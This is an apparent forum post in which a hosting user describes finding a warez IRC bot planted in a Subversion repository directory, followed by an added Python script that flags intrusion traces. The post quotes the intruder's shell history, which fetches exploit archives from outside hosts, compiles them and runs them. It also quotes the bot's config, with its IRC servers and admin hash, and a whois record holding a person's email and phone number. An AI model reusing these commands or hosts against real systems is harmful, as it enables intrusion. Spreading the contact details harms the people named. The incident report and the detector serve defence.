Note: not posting this from my main account.
So this all started when I tried to commit something to one of my subversion repositories, today.
Code:
> svn commit -m "My message."
Sending FILENAME
Transmitting file data .svn: Commit failed (details follow):
svn: MERGE request failed on '/PATH/TO/REPOSITORY/trunk'
svn: Can't move '/home/USERNAME/svn/REPOSITORY/db/transactions/199-1.txn/rev' to '/home/USERNAME/svn/REPOSITORY/db/revs/200': Is a directory
I wasn't really sure why I was getting this error, so I ssh'ed into my server, changed to that directory, and saw the following:
Code:
ls -a ~/svn/REPOSITORY/db/revs/200/
.
..
{various .tar files containing disgusting porn titles and strings like DVDRIP and XVID}
httpd
sql
tmp.pid
tmp.state
tmp.state~
x
Crap. Porn. And an httpd binary. Looks like they are using my account to serve up porno all across the web.
Contents of sql:
Code:
pidfile tmp.pid
#logfile mybot2.log
logstats none
#logrotate weekly
statefile tmp.state
connectionmethod direct
server_join_raw
server_connected_raw
channel_join_raw
server und3rd0g.ma.cx 6667
server und3rd0g.ma.cx 6660
server beast.crabdance.com 6667
server beast.crabdance.com 6660
server beast.servegame.org 6667
server beast.servegame.org 6660
server evengod.gotdns.org 6667
server evengod.gotdns.org 6660
loginname beast
channel #beast-stro -plist 10
channel #beast-xdcc -plist 30
user_nick beast-Dream-sushi
user_realname beastxdcc
user_modes +i
autoignore_exclude *!yarden@*.*
slotsmax 15
queuesize 30
maxtransfersperperson 1
maxqueueditemsperperson 1
filedir /home/USERNAME/svn/REPOSITORY/db/revs/200
restrictlist
restrictprivlist
restrictprivlistmsg Take Your time .. ill list in the channel, go get a beer!
restrictsend
respondtochannelxdcc
respondtochannellist
smallfilebypass 1048
downloadhost *!*@*
transferminspeed 1
creditline Brought to you by Beast-XDCC
adminpass 7fORyvKdK2IAc
adminhost *!~@*.*
adminhost *!@*.*
adminhost *!*@*.*
uploadhost *!*@*
uploaddir /home/USERNAME/svn/REPOSITORY/db/revs/200
uploadmaxsize 0
hideos
notifytime 0
Other files were all binary except for the tmp.pid file which just had a process ID.
At this point, I decided at a whim to check my .bash_history file.
Code:
id
uname -a
uptime
w
cd /tmp
ls
mkdir .a
ls
cd .a
pwpwd
pwd
ls
wget mafioza.net/local1.tar.gz
tar -xzf local1.tar.gz
cd local1
ls
gcc prctlpute.c -o prctlpute
./prctlpute
chmod 777 *
ls
./prctlpute
wget mafioza.net/local.tar.gz
tar -xzf local.tar.gz
cd local
ls
./a
pwd
cd /tmp
rm -fr .a
ls
mkdir .tmp
cd .tmp
ls
cd local
ls
cd ..
ls
cd knb
ls
cat conf
cat aa
ssh
id
wget wget mafija.la/~loco/.unix/redone.tar.gz
tar -xzf redone.tar.gz
ls
cd redone
ls
cat config
./config XentoniX 11180
./config
cd
ls
pwd
ls
./fucj
./**** (censored out. should be obvious from the previous typo.)
ls
cd ..
ls
mkdir .a
cd .a
ls
wget mafioza.net/knb2.tar.gz
tar -xzf knb2.tar.gz
ls
cd knb
ls
cat
cd /tmp/.tmp
ls
cd knb
ls
cd .a
ls
cd knb
ls
rm conf
wget mafioza.net/conf
./knb conf
chmod 777 *
ls
./knb conf
id
ps x
cat /tmp/bdpl
Wow. And guess what? All of those files they downloaded are still available from their server.
Code:
>whois mafioza.net
Whois Server Version 2.0
Domain names in the .com and .net domains can now be registered
with many different competing registrars. Go to http://www.internic.net
for detailed information.
Domain Name: MAFIOZA.NET
Registrar: TUCOWS INC.
Whois Server: whois.opensrs.net
Referral URL: http://domainhelp.tucows.com
Name Server: NS2.AFRAID.ORG
Name Server: NS1.AFRAID.ORG
Status: REGISTRAR-LOCK
EPP Status: clientDeleteProhibited
EPP Status: clientTransferProhibited
EPP Status: clientUpdateProhibited
Updated Date: 22-May-2006
Creation Date: 22-May-2006
Expiration Date: 22-May-2016
>>> Last update of whois database: Tue, 05 Sep 2006 16:41:08 EDT <<<
Registrant:
Eurospin eko d.o.o.
Renski podkraj 65
RENCE, Slovenia 5292
SI
Domain name: MAFIOZA.NET
Administrative Contact:
MihajlovicDraza, KPAJNHAevropskaZajednica martina.bacic@eurospineko.si
Renski podkraj 65
RENCE, Slovenia 5292
SI
+386.41962364
Technical Contact:
Technical support, SiOL dns@siol.net
Cigaletova 15
Ljubljana, 1000
SI
+386.14730000 Fax: +386.14730016
Registration Service Provider:
SiOL d.o.o., tomaz.pernovsek@siol.si
+386 1 473 00 00
Registrar of Record: TUCOWS, INC.
Record last updated on 22-May-2006.
Record expires on 22-May-2016.
Record created on 22-May-2006.
Domain servers in listed order:
NS1.AFRAID.ORG
NS2.AFRAID.ORG
Domain status: clientDeleteProhibited
clientTransferProhibited
clientUpdateProhibited
The files from mafioza.net look to be the standard buffer-overflow-hack-a-linux-script-kiddie stuff, but I am not too familiar with these things.
Do any of you guys have any ideas? What do you think? I don't think I was password-guessed since my password was over 8 characters long and contained letters of both cases as well as numbers. Regardless, I changed my password as soon as I found out about all of this stuff.
Do you think it could be due to an insecure install of phpBB or Gallery? Almost everything I am running is of the latest version, but occasionally it takes me a couple months to upgrade everything. Or maybe the server I am on was generally hacked and they just started using accounts existing on the machine?
I have alerted Dreamhost about all of this. I'll let you know how they respond.
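As an added example (my own, not code from the original post or from any tool it mentions), here is a small Python triage script covering two of the things the post shows: it runs a handful of indicator rules over a shell history (hidden staging directory under /tmp, archive download, compile, execute, chmod 777) and flags the combination as an exploit-staging chain, and it walks a Subversion FSFS repository's db/revs directory and reports any entry that is not a numbered revision file, which is exactly what the "Is a directory" commit error above was pointing at. The hostname, paths and the sample history are constructed placeholders; the rules are triage hints, not proof on their own.

```python
"""Triage helpers for the kind of incident described in the post.

Added example, not code from the original post. The download host and
the repository skeleton are constructed placeholders.
"""
import os
import re
import tempfile

# Constructed sample shell history, modelled on the one in the post
# (the download host is a placeholder).
SAMPLE_HISTORY = """\
id
uname -a
cd /tmp
mkdir .a
cd .a
wget EXAMPLE-HOST.invalid/local1.tar.gz
tar -xzf local1.tar.gz
cd local1
gcc prctlpute.c -o prctlpute
./prctlpute
chmod 777 *
ls
"""

# Indicator rules: each one is a hint, not proof. The combination
# (hidden staging dir, archive download, compile or run) is what matters.
RULES = [
    ("hidden-dir", re.compile(r"^\s*mkdir\s+(-p\s+)?(/tmp/|/var/tmp/|/dev/shm/)?\.[^\s/.]\S*")),
    ("archive-download", re.compile(r"^\s*(wget|curl)\b.*\.(tar\.gz|tgz|tar|zip|gz)\b")),
    ("compile", re.compile(r"^\s*(gcc|cc|g\+\+|make)\b")),
    ("run-local-binary", re.compile(r"^\s*\./\S+")),
    ("world-writable", re.compile(r"^\s*chmod\s+(-R\s+)?(0?777|a\+rwx)\b")),
]


def scan_history(text):
    """Return (line_number, rule_name, line) for every rule that matches."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                hits.append((number, name, line))
    return hits


def looks_like_exploit_staging(hits):
    """True when the history shows the whole chain: a hidden directory,
    an archive fetched into it, and something compiled or executed."""
    seen = {name for _, name, _ in hits}
    return bool("hidden-dir" in seen and "archive-download" in seen
                and {"compile", "run-local-binary"} & seen)


def check_fsfs_revs(repo_dir):
    """Return db/revs entries that do not belong in an FSFS repository.

    Unsharded layout: every entry is a numbered regular file. Sharded
    (unpacked) layout: numbered directories holding numbered regular
    files. Anything else (such as the revs/200 directory full of .tar
    files in the post) is reported by its path relative to db/revs."""
    revs = os.path.join(repo_dir, "db", "revs")
    unexpected = []
    for name in sorted(os.listdir(revs)):
        path = os.path.join(revs, name)
        if not name.isdigit() or os.path.islink(path):
            unexpected.append(name)
        elif os.path.isfile(path):
            continue
        elif os.path.isdir(path):
            for child in sorted(os.listdir(path)):
                child_path = os.path.join(path, child)
                if not (child.isdigit() and os.path.isfile(child_path)
                        and not os.path.islink(child_path)):
                    unexpected.append("/".join((name, child)))
        else:
            unexpected.append(name)
    return unexpected


def build_demo_repo():
    """Create a throwaway repository skeleton mimicking the post: revision
    files 0..3 plus a planted directory '4' holding an httpd binary and a
    bot config. Constructed for the demo, not a real repository."""
    root = tempfile.mkdtemp(prefix="fsfs-demo-")
    revs = os.path.join(root, "db", "revs")
    os.makedirs(revs)
    for rev in range(4):
        with open(os.path.join(revs, str(rev)), "w") as fh:
            fh.write("placeholder revision data\n")
    planted = os.path.join(revs, "4")
    os.makedirs(planted)
    for name in ("httpd", "sql"):
        with open(os.path.join(planted, name), "w") as fh:
            fh.write("planted\n")
    return root


if __name__ == "__main__":
    hits = scan_history(SAMPLE_HISTORY)
    for number, rule, line in hits:
        print(f"line {number:3d} [{rule}] {line}")
    print("staging chain:", looks_like_exploit_staging(hits))
    print("unexpected in db/revs:", check_fsfs_revs(build_demo_repo()))
```

On a real box, point scan_history at the contents of each user's .bash_history and check_fsfs_revs at the repository root; a directory where a revision file should be is a strong sign the repository has been used as a drop, and the bot config and pidfile found there tell you what process to look for in ps output.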